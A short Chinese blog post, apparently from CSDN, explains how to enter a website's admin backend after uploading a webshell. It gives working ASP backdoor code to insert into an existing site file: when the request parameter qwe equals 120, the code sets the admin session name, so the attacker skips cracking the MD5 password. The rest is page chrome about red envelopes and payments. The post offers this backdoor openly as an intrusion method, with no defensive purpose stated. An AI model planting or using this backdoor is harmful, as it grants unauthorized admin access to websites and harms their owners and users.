利用WEBSHELL直接进入后台!

首先,我们要上传一个木马,通过下载数据库或者其他方法得到管理员的用户名。然后找到一个ASP文件,在其中的<%…………%>之间加上

dim id
id=trim(request("qwe"))
if id="120" then
session("AdminName")="管理员用户名"
end if

然后访问的时候在这个ASP文件后面加上?qwe=120

然后进入后台页面,是不是直接进去了?不用你输入用户名和口令了吧…………这里我们就少了一步(破解MD5密码)…………嗯,不错
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值